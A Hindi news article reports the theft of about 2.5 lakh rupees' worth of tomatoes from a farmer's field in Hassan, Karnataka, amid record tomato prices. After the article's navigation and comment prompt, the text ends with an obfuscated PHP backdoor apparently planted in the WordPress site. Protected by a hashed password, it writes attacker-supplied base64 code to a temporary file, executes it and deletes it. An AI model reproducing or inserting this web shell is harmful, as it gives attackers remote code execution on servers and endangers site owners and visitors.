ना सोना ना चांदी… यहां चोरों ने खेत पर डाला डाका, उड़ा दिए 2.5 लाख रुपये के टमाटर

Uttarakhand Press 06 July 2023: Tomatoes Stolen in Karnataka कर्नाटक के हासन जिले में टमाटर की चोरी का मामला सामने आया है। किसान का आरोप है कि चोरों ने उसके खेत से कई किलो टमाटर चोरी कर लिए। चोरी हुए टमाटर की कीमत करीब ढाई लाख रुपये बताई जा रही है। पुलिस ने अज्ञात चोरों के खिलाफ केस दर्ज कर लिया है। मामले की जांच की जा रही है।

देश में महंगाई तेजी से बढ़ रही है। सब्जियों से लेकर दालों तक के दाम आसमान पर हैं। खासतौर पर टमाटर की कीमतों ने तो रिकॉर्ड तोड़ दिए हैं। देशभर में टमाटर के दाम 100 रुपये प्रति किलो के पार हो गए हैं। कई राज्यों में तो टमाटर 150 रुपये प्रति किलो तक पहुंच गया है। आलम ये है कि आम जनता के लिए खाने में टमाटर का इस्तेमाल करना हकीकत से काफी दूर है। टमाटर के अलावा अन्य सब्जियों की कीमतों ने भी आम आदमी के किचन का बजट बिगाड़ दिया है।

टमाटर की बढ़ती कीमतों के बीच कर्नाटक में हैरान कर देने वाला एक मामला सामने आया है। अब तक आपने सोना-चांदी या अन्य कीमती सामान की चोरी सुनी होगी, लेकिन हासन जिले में अजीब ही मामला सामने आया है। चोरों ने किसी घर या बंगले में नहीं, बल्कि एक किसान के खेत पर डाका डाला है। आरोप है कि चोरों ने किसान के खेत से लाखों रुपये के टमाटरों पर हाथ साफ कर दिया है।

ढाई लाख रुपये के टमाटर चोरी:
टमाटरों की चोरी का मामला चार जुलाई की रात का है। किसान धरनी का कहना है कि उसके खेत से चोरों ने कई किलों टमाटर चुरा लिए हैं। टमाटरों की कीमत करीब ढाई लाख रुपये है। धरनी ने बताया कि उसने दो एकड़ जमीन पर टमाटर की फसल उगाई थी। टमाटर की फसल काटकर वो उसे बाजार में बेचने की प्लानिंग कर रही थी, लेकिन तभी चोरों ने टमाटरों पर हाथ साफ कर दिया।

चोरों के खिलाफ केस दर्ज:
धरनी ने टमाटर चोरी की शिकायत पुलिस से की है। धरनी ने बताया कि उसे सेम की फसल में नुकसान हुआ था, इसलिए उसने कर्जा लेकर टमाटर की फसल उगाई थी। धरनी ने बताया कि चोरों ने टमाटर चोरी के बाद उसकी फसल भी नष्ट कर दी। हलेबीडु पुलिस थाने में इसकी शिकायत दर्ज कराई गई है।

Read Previous

Ram Mandir: CISF के हवाले राम मंदिर की सुरक्षा का जिम्मा, नए प्लान को शासन से मंजूरी, लगेंगे आधुनिक उपकरण

Read Next

Accident: दिल्ली-जयपुर हाईवे पर किनारे खड़े लोगों को वाहन ने रौंदा, चार की मौत, कई घायल

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}